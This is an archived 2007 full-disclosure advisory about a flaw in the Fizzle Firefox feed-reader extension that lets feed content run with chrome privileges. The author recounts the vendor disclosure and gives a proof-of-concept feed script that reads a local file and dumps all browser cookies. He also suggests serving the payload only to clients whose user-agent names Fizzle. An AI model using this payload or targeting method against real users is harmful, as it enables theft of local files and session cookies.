TUCoPS :: Browsers :: tb10089.htm

Fizzle : Firefox Extension Vulnerability
Fizzle : Firefox Extension Vulnerability
Fizzle : Firefox Extension Vulnerability

Fizzle allows feeds to use HTML in feed data resulting in JavaScript being
run in the chrome: window with chrome permissions. The extension will
convert HTML entities back to their ASCII equivalents thus < becomes <
and so forth. Various feeds fields are vulnerable including the title which
allows the code to execute when Fizzle is opened and no need for the feed
to be viewed.

The author Andy Frank was notified about the issue on 01/29/2007 we
corresponded on the issue and I even offered to create a patch which I did.
The patch did not meet his liking since the sanitation was too strict and
made some feeds who use certain tags like 

for formatting to lose their layout I told him it would be too difficult to sanitize the data unless its strict because so many attack variations could be used, and best thing to do is not allow HTML at all in the feed. On 02/20/2007 we ended discussions on this and I notified addons.mozilla.org about the problem and the developers lack of concern in fixing the extension or at least disabling its download so people would not download the extension. Well Mozilla didn't bother to remove it and have chosen to remove the extension in a future date when addons.mozilla.org is updated. Since then over 2,000+ users have additionally downloaded the extension, invoking me to go full-disclosure about it. Fizzle 0.5 (previous versions likely vulnerable as well) https://addons.mozilla.org/firefox/1307/ Below is the example I have tested out using version 0.5 and under nightly Firefox. Please note that the HTML entities must be present for the exploit to work. Place the below in your feed body and subscribe to the feed. View the feed in Fizzle. When testing make sure you clear the Fizzle cache in the fizzle folder under the Firefox profile. An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP request sends a custom user-agent which has the word 'Fizzle' in it. Detecting that keyword an attacker can serve a malicious copy of the feed instead. - ------------------------------------------------------------------------- POC: Local File Reading and Cookie Reading (The HTML entities MUST be used) - ------------------------------------------------------------------------- <script> function read(readfile) { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(readfile); var is Components.classes["@mozilla.org/network/file-input-stream;1"] .createInstance(Components.interfaces.nsIFileInputStream); is.init(file, 0x01, 00004, null); var sis Components.classes["@mozilla.org/scriptableinputstream;1"] .createInstance(Components.interfaces.nsIScriptableInputStream); sis.init(is); var output = sis.read(sis.available()); alert(output); } read("C:\test.txt"); function getCookies() { var cookieManager Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var str = ''; var iter = cookieManager.enumerator; while (iter.hasMoreElements()) { var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie) { str += "Host: " + cookie.host + "\nName: " + cookie.name + "\nValue: " + cookie.value + "\n\n"; } } alert(str); } getCookies() </script> - ------------------------------------------------------------------------- I apologize for the blank emails before. Outblaze the provider for my other email was for some reason sending the email as blank. So using this account instead Regards, CM. ____________________________________________________________________________________ It's here! Your new message! Get new email alerts with the free Yahoo! Toolbar. http://tools.search.yahoo.com/toolbar/features/mail/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH